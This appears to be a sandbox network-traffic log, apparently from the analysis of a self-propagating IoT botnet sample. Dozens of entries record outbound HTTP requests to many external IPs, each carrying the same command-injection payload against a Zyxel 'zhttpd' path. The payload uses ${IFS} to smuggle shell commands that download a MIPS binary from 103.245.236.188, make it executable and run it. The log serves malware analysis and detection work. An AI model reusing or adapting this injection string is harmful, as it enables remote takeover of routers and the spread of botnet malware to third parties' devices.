                                                Jan 12, 2024 18:16:34.722548008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7397192.168.2.2338024193.113.155.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.722594976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7398192.168.2.2350720196.55.18.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.722656012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7399192.168.2.2334938104.202.31.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.722682953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7400192.168.2.234651060.79.97.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.722733021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7401192.168.2.2338950104.110.228.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.722768068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7402192.168.2.236095684.33.18.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.722815990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7403192.168.2.2342902132.135.84.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.722843885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7404192.168.2.23346968.39.130.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.722883940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7405192.168.2.235962837.109.61.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.722943068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7406192.168.2.2334760197.73.112.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.723000050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7407192.168.2.234930289.88.64.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.723033905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7408192.168.2.2334312190.241.131.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.723057032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7409192.168.2.2338052101.84.108.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.723074913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7410192.168.2.2342612173.240.33.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.723114967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7411192.168.2.2347032116.113.127.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.723145962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7412192.168.2.234443849.89.221.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.723169088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7413192.168.2.2343396103.6.254.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.723233938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7414192.168.2.2347400195.131.250.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.723283052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7415192.168.2.234665214.49.111.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.723315954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7416192.168.2.233916279.104.216.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.723361015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7417192.168.2.2360820189.249.175.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.723422050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7418192.168.2.234529254.38.193.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.723442078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7419192.168.2.235882420.2.151.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.723499060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7420192.168.2.2341916136.47.104.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.723545074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7421192.168.2.235834849.224.118.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.723596096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7422192.168.2.234512869.19.48.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.723628044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7423192.168.2.2338810169.83.234.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.723671913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7424192.168.2.235453641.29.79.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.723697901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7425192.168.2.2333358210.234.97.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.727547884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7426192.168.2.2349182169.254.70.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.727583885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7427192.168.2.23430548.90.73.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.727629900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7428192.168.2.235188491.10.195.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.727647066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7429192.168.2.235241658.77.11.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.727724075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7430192.168.2.234828220.178.134.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.727735043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7431192.168.2.2346650196.124.156.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.727762938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7432192.168.2.2353458133.150.8.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.727824926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7433192.168.2.234714031.4.155.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.727858067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7434192.168.2.235092898.205.10.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.727884054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7435192.168.2.234424420.118.118.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.727912903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7436192.168.2.2345056187.214.35.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.727957010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7437192.168.2.2334074118.39.190.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.728022099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7438192.168.2.2353556206.206.52.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.728055000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7439192.168.2.233589632.41.11.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.728101969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7440192.168.2.233642696.37.126.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.728121042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7441192.168.2.2353494107.132.99.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.728168011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7442192.168.2.234327441.140.2.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.728200912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7443192.168.2.2344008112.22.176.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.728259087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7444192.168.2.2355420113.241.34.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:34.737437963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7445192.168.2.234268424.43.174.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.739110947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7446192.168.2.2350608122.67.164.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.739187956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7447192.168.2.235423499.198.67.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.739381075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7448192.168.2.235064881.74.152.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.739414930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7449192.168.2.2346534123.18.215.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.739435911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7450192.168.2.234791464.188.25.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.739500046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7451192.168.2.2355118163.215.200.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.739577055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7452192.168.2.233743059.108.9.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.739608049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7453192.168.2.235467086.206.111.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.739677906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7454192.168.2.235986461.43.241.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.739713907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7455192.168.2.2338068113.238.213.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.739768028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7456192.168.2.2360154131.233.149.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.739810944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7457192.168.2.235087678.148.206.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.739883900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7458192.168.2.234693871.160.79.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:35.739917040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7459192.168.2.2341276180.66.99.236443
                                                TimestampBytes transferredDirectionData
